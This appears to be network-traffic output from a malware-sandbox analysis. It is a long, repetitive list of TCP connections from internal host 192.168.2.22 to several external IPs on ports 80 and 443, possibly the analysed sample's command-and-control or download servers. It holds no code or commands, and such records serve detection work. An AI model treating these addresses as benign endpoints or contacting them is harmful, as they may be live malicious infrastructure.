Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 217.76.130.178:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 217.76.130.178:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 217.76.130.178:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 217.76.130.178:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 217.76.130.178:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 217.76.130.178:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 217.76.130.178:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 217.76.130.178:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 217.76.130.178:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 217.76.130.178:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
